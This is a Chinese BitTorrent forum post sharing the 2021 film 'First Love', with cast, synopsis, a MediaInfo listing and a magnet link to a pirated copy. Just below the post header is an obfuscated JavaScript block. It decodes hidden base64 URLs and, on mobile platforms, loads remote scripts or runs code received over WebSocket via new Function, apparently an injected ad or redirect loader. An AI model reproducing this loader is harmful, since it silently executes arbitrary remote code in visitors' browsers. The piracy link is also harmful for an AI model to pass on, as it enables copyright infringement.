初爱.First.Love.2021.1080p.AMZN.WEB-DL.DDP5.1.H.264 4.47GB

版主小s 1月前 851

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 初爱
◎片  名 First Love
◎年  代 2021
◎产  地 美国
◎类  别 爱情
◎语  言 英语
◎IMDb链接 https://www.imdb.com/title/tt14726510/
◎豆瓣链接 https://movie.douban.com/subject/35474002/
◎导  演 A.J. 爱德华兹 A.J. Edwards (id:1340734)
◎编  剧 A.J. 爱德华兹 A.J. Edwards (id:1340734)
◎演  员 黛安·克鲁格 Diane Kruger (id:1025151)
       杰弗里·多诺万 Jeffrey Donovan (id:1044732)
       赫洛·费因斯-提芬 Hero Fiennes Tiffin (id:1226711)
       戴安·维诺拉 Diane Venora (id:1157624)
       西德尼·帕克 Sydney Park (id:1238688)
       克里斯·加卢斯特 Chris Galust (id:1425149)
       布鲁斯·韦克斯勒 Bruce Wexler (id:1418436)

◎简  介
  赫洛·费因斯-提芬、黛安·克鲁格、杰弗里·多诺万([人之怒])、西德尼·帕克([女生要革命])主演了爱情题材新片[初恋](First Love,暂译)。A·J·爱德华兹([少年林肯])自编自导,故事讲述吉姆(费因斯-提芬饰)是一个高三学生,他正在经历与安(帕克饰)的初恋 的高潮和低谷。与此同时,吉姆的父母(多诺万与克鲁格分饰)正在处理由2008年金融危机引发的家庭矛盾。该片已在洛杉矶开拍。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 272190857775746851864732033750585789830 (0xCCC60D675364511F041E685F14A34D86)

  4. Complete name                            : [email protected]mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 4.47 GiB

  8. Duration                                 : 1 h 59 min

  9. Overall bit rate mode                    : Constant

  10. Overall bit rate                         : 5 369 kb/s

  11. Encoded date                             : UTC 2021-07-30 10:29:17

  12. Writing application                      : mkvmerge v43.0.0 ('The Quartermaster') 64-bit

  13. Writing library                          : libebml v1.3.10 + libmatroska v1.5.2


  14. Video

  15. ID                                       : 1

  16. Format                                   : AVC

  17. Format/Info                              : Advanced Video Codec

  18. Format profile                           : [email protected]

  19. Format settings                          : CABAC / 4 Ref Frames

  20. Format settings, CABAC                   : Yes

  21. Format settings, Reference frames        : 4 frames

  22. Codec ID                                 : V_MPEG4/ISO/AVC

  23. Duration                                 : 1 h 59 min

  24. Bit rate mode                            : Constant

  25. Bit rate                                 : 4 727 kb/s

  26. Nominal bit rate                         : 10 000 kb/s

  27. Width                                    : 1 920 pixels

  28. Height                                   : 800 pixels

  29. Display aspect ratio                     : 2.40:1

  30. Frame rate mode                          : Constant

  31. Frame rate                               : 23.976 (24000/1001/53354) FPS

  32. Color space                              : YUV

  33. Chroma subsampling                       : 4:2:0

  34. Bit depth                                : 8 bits

  35. Scan type                                : Progressive

  36. Bits/(Pixel*Frame)                       : 0.128

  37. Stream size                              : 3.94 GiB (88%)

  38. Default                                  : Yes

  39. Forced                                   : No

  40. Color range                              : Limited

  41. Color primaries                          : BT.709

  42. Transfer characteristics                 : BT.709

  43. Matrix coefficients                      : BT.709


  44. Audio

  45. ID                                       : 2

  46. Format                                   : E-AC-3

  47. Format/Info                              : Enhanced AC-3

  48. Commercial name                          : Dolby Digital Plus

  49. Codec ID                                 : A_EAC3

  50. Duration                                 : 1 h 59 min

  51. Bit rate mode                            : Constant

  52. Bit rate                                 : 640 kb/s

  53. Channel(s)                               : 6 channels

  54. Channel layout                           : L R C LFE Ls Rs

  55. Sampling rate                            : 48.0 kHz

  56. Frame rate                               : 31.250 FPS (1536 SPF)

  57. Compression mode                         : Lossy

  58. Stream size                              : 546 MiB (12%)

  59. Title                                    : Japanese

  60. Language                                 : Japanese

  61. Service kind                             : Complete Main

  62. Default                                  : No

  63. Forced                                   : No



TAGS 爱情

磁力链:
  • magnet:?xt=urn:btih:08AC88A6F435EEAAA7BF711019D77ED509B2C861
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回